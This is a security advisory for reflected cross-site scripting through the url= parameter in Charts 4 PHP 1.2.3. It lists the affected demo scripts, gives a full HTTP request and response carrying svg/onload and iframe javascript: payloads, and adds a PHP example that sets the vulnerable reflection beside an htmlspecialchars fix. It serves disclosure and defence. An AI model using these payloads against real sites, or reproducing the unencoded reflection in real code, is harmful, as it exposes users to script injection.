Charts 4 PHP 1.2.3 Cross Site Scripting

2016-02-08T00:00:00
ID PACKETSTORM:135666
Type packetstorm
Reporter 1N3
Modified 2016-02-08T00:00:00

Description

                                        
# Exploit Title: Charts 4 PHP 1.2.3 Cross Site Scripting  
# Date: 2016/2/7  
# Researcher: 1N3 @CrowdShield - https://crowdshield.com  
# Vendor Homepage: http://www.chartphp.com  
# Software Link: http://www.chartphp.com  
# Version: 1.2.3  
# CVE : N/A  
  
+- --=[Description:   
Charts 4 PHP version 1.2.3 is vulnerable to multiple reflected cross-site scripting vulnerabilities: several of its default pages reflect the url= parameter into their HTML output without encoding it.  
  
+- --=[Affected Params:   
url=  
  
+- --=[Bug Evidence:   
  
VULNERABLE CODE (magpie_simple.php, line numbers as reported):  
User input is read straight from the request and passed on through function parameters; the fetch on line 9 is reached only when the guard on line 8 passes:  
  
6: $url = $_GET['url'];  
8: if($url)  
9: $rss = fetch_rss ($url);  
  
The trace shows the parameter reaching fetch_rss(); the cross-site scripting sink is the same page echoing $url back, unencoded, into the value attribute of the "RSS URL" input, as the response below shows.  
  
Vulnerability is also triggered in:  
/crowdshield/charts4php/bootstrap/rss/scripts/magpie_debug.php  
/crowdshield/charts4php/bootstrap/rss/scripts/simple_smarty.php  
/crowdshield/charts4php/bootstrap/rss/scripts/magpie_slashbox.php  
/crowdshield/charts4php/bootstrap/rss/rss_fetch.inc  
/crowdshield/charts4php/bootstrap/rss/rss_parse.inc  
  
  
HTTP REQUEST:  
  
GET /charts4php/bootstrap/rss/scripts/magpie_simple.php?url=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%27%22--+ HTTP/1.1  
Host: host.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://crowdshield.com/charts4php/bootstrap/rss/scripts/magpie_simple.php?url=%3Ciframe+src%3D%22+javascript%3Aalert%28%27https%3A%2F%2Fcrowdshield.com%27%29%3B%22%3E%3C%2Fiframe%3E+  
Cookie: __cfduid=d89da9abfef7f775eadafcdc1008eac6b1454814806; __utma=242435792.1300894982.1454814681.1454885335.1454891081.5; __utmz=242435792.1454814681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.1300894982.1454814681; __atuvc=1%7C5%2C5%7C6; PHPSESSID=qlct9igheoh2ofg7bo8g8ss691; __utmb=242435792.31.10.1454891081; __utmc=242435792; __atuvs=56b7e04adb06138a001  
Connection: close  
  
HTTP RESPONSE (excerpt):  
  
Channel: <p><ul></ul>  
<form>  
RSS URL: <input type="text" size="30" name="url" value=""><svg/onload=alert(1)>'"-- "><br />  
<input type="submit" value="Parse RSS">  
</form>  
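The reflection pattern the advisory documents, reconstructed from the response above, beside a hardened version. This is an added example and not Charts 4 PHP's or the advisory author's own code: the function names, the form markup and the fallback to the advisory's payload on the command line are assumptions, and only the attribute-context encoding fix is shown.

```php
<?php
// Added example (not Charts 4 PHP's own code): the reflected-XSS pattern
// described in the advisory, reconstructed from the response shown above,
// next to a hardened version. Function names and markup are assumptions.

declare(strict_types=1);

// The advisory's payload, URL-decoded from
// url=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%27%22--+
const ADVISORY_PAYLOAD = '"><svg/onload=alert(1)>\'"-- ';

// Vulnerable pattern: the request parameter is interpolated straight into
// an attribute value. A leading double quote closes the attribute and the
// remainder of the string becomes markup, which is exactly what the
// advisory's response excerpt shows.
function render_form_vulnerable(string $url): string
{
    return '<form>' . "\n"
        . 'RSS URL: <input type="text" size="30" name="url" value="' . $url . '"><br />' . "\n"
        . '<input type="submit" value="Parse RSS">' . "\n"
        . '</form>';
}

// Hardened pattern: encode for the HTML attribute context before output.
// ENT_QUOTES covers both quote characters, so neither ' nor " can end the
// attribute; ENT_HTML5 plus an explicit charset avoids encoding surprises.
function render_form_safe(string $url): string
{
    $escaped = htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form>' . "\n"
        . 'RSS URL: <input type="text" size="30" name="url" value="' . $escaped . '"><br />' . "\n"
        . '<input type="submit" value="Parse RSS">' . "\n"
        . '</form>';
}

// The check to run against a captured response body: does the raw payload,
// including its attribute-breaking quote and the <svg> tag, survive verbatim?
function payload_reflected_unescaped(string $body, string $payload): bool
{
    return strpos($body, $payload) !== false;
}

// Stand-alone demo. Under a web server this reads url= like the affected
// pages do; from the CLI ($_GET is empty) it falls back to the payload.
$input = $_GET['url'] ?? ADVISORY_PAYLOAD;

echo "--- vulnerable rendering ---\n", render_form_vulnerable($input), "\n\n";
echo "--- hardened rendering ---\n", render_form_safe($input), "\n\n";

echo 'vulnerable reflects payload unescaped: ',
    var_export(payload_reflected_unescaped(render_form_vulnerable($input), ADVISORY_PAYLOAD), true), "\n";
echo 'hardened reflects payload unescaped:   ',
    var_export(payload_reflected_unescaped(render_form_safe($input), ADVISORY_PAYLOAD), true), "\n";
```

Run with `php render.php` to see the two renderings side by side; the vulnerable output reproduces the `value=""><svg/onload=alert(1)>'"-- ">` line from the advisory's response, while the hardened output keeps the whole payload inside the attribute. The encoding shown is specific to the attribute context; a value reflected into a script block or a URL needs the encoding for that context instead. Since the affected files all live under bootstrap/rss/scripts/ and are demo pages rather than chart functionality, removing them from a deployment closes the reflected sink independently of any encoding fix.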